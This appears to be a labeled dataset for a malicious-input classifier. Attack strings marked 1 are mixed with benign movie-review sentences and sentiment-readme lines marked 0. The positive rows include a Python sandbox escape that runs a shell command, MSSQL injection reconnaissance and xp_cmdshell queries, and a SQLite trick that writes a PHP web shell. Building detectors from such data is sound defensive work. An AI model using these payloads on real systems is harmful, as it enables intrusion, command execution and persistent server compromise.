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"().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__(""os"").popen(""ls /"").read()' )",1
SELECT @@version,1
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SELECT system_user,1
SELECT user,1
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID,1
select IS_SRVROLEMEMBER('sysadmin'),1
select IS_SRVROLEMEMBER('db_owner'),1
SELECT name FROM master..syslogins,1
SELECT name FROM master..sysdatabases,1
"select concat_ws(table_schema,table_name,column_name) from information_schema.columns",1
select quotename(name) from master..sysdatabases FOR XML PATH(''),1
EXEC xp_cmdshell 'net user',1
SELECT char(0x41),1
SELECT ascii('A'),1
SELECT char(65)+char(66) => return AB,1
WAITFOR DELAY '0:0:3' pause for 3 seconds,1
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select text from sys.dm_exec_requests cross apply sys.dm_exec_sql_text(sql_handle),1
select host_name(),1
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"exec xp_regread N'HKEY_LOCAL_MACHINE', N'SYSTEM\CurrentControlSet\Services\MSSEARCH'",1
ATTACH DATABASE '/var/www/lol.php' AS lol;,1
CREATE TABLE lol.pwn (dataz text);,1
INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');--,1
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"3. sentiment_labels.txt contains all phrase ids and the corresponding sentiment labels, separated by a vertical line.",0
Note that you can recover the 5 classes by mapping the positivity probability using the following cut-offs:,0
"[0, 0.2], (0.2, 0.4], (0.4, 0.6], (0.6, 0.8], (0.8, 1.0]",0
"for very negative, negative, neutral, positive, very positive, respectively.",0
Please note that phrase ids and sentence ids are not the same.,0
"If nothing else, this movie introduces a promising, unusual kind of psychological horror.",0
"In a normal screen process, these bromides would be barely enough to sustain an interstitial program on the Discovery Channel. But in Imax 3-D, the clichés disappear into the vertiginous perspectives opened up by the photography.",0
Writer-director Burger imaginatively fans the embers of a dormant national grief and curiosity that has calcified into chronic cynicism and fear.,0
...a roller-coaster ride of a movie,0
"I enjoyed Time of Favor while I was watching it, but I was surprised at how quickly it faded from my memory.",0
"Chicago is sophisticated, brash, sardonic, completely joyful in its execution.",0
Steve Irwin's method is Ernest Hemmingway at accelerated speed and volume.,0
A refreshing Korean film about five female high school friends who face an uphill battle when they try to take their relationships into deeper waters.,0
"On the surface, it's a lovers-on-the-run crime flick, but it has a lot in common with Piesiewicz's and Kieslowski's earlier work, films like The Double Life of Veronique.",0
"The values that have held the Enterprise crew together through previous adventures and perils do so again-courage, self-sacrifice and patience under pressure.",0
"If it's possible for a sequel to outshine the original, then SL2 does just that.",0
A romantic comedy that operates by the rules of its own self-contained universe.,0
"Enormously likable, partly because it is aware of its own grasp of the absurd.",0
"Here's a British flick gleefully unconcerned with plausibility, yet just as determined to entertain you.",0
"It's an old story, but a lively script, sharp acting and partially animated interludes make Just a Kiss seem minty fresh.",0
Must be seen to be believed.,0
"Ray Liotta and Jason Patric do some of their best work in their underwritten roles, but don't be fooled: Nobody deserves any prizes here.",0
"Everything that has to do with Yvan and Charlotte, and everything that has to do with Yvan's rambunctious, Jewish sister and her non-Jew husband, feels funny and true.",0
"The year's happiest surprise, a movie that deals with a real subject in an always surprising way.",0
Fans of Behan's work and of Irish movies in general will be rewarded by Borstal Boy.,0
"Its mysteries are transparently obvious, and it's too slowly paced to be a thriller. (But it's) worth recommending because of two marvelous performances by Michael Caine and Brendan Fraser.",0
"The film is faithful to what one presumes are the book's twin premises -- that we become who we are on the backs of our parents, but we have no idea who they were at our age; and that time is a fleeting and precious commodity no matter how old you are.",0
Stephen Earnhart's homespun documentary Mule Skinner Blues has nothing but love for its posse of trailer park denizens.,0
A solidly seaworthy chiller.,0
If you can get past the fantastical aspects and harsh realities of ``The Isle'' you'll get a sock-you-in-the-eye flick that is a visual tour-de-force and a story that is unlike any you will likely see anywhere else.,0
"There are as many misses as hits, but ultimately, it finds humor in the foibles of human behavior, and it's a welcome return to the roots of a genre that should depend on surprises.",0
A well-made thriller with a certain level of intelligence and non-reactionary morality.,0
"There's enough science to make it count as educational, and enough beauty to make it unforgettable.",0
"Remains a solid, if somewhat heavy-handed, account of the near-disaster...done up by Howard with a steady, if not very imaginative, hand.",0
Makmalbaf follows a resolutely realistic path in this uncompromising insight into the harsh existence of the Kurdish refugees of Iran's borderlands.,0
"For a good chunk of its running time, Trapped is an effective and claustrophobic thriller.",0
Most of Crush is a clever and captivating romantic comedy with a welcome pinch of tartness.,0
Nair does capture the complexity of a big family and its trials and tribulations...,0
"The seaside splendor and shallow, beautiful people are nice to look at while you wait for the story to get going.",0
Rare is the 'urban comedy' that even attempts the insight and honesty of this disarming indie.,0
Ranks among Willams' best screen work.,0
Engagingly captures the maddening and magnetic ebb and flow of friendship.,0